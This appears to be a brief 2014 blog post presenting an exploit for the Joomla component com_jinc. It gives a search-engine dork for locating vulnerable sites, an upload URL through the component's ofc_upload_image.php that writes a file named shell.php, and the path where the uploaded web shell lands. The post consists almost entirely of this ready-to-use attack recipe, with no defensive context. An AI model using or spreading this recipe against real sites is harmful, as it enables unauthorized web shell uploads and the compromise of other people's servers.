Friday, 7 March 2014

Exploit Joomla! : com_jinc






POC:

Dork: inurl:option=com_jinc

Exploit: 

/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=shell.php 

Shell Uploaded to:

 /administrator/components/com_jinc/classes/graphics/tmp-upload-images/shell.php


This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15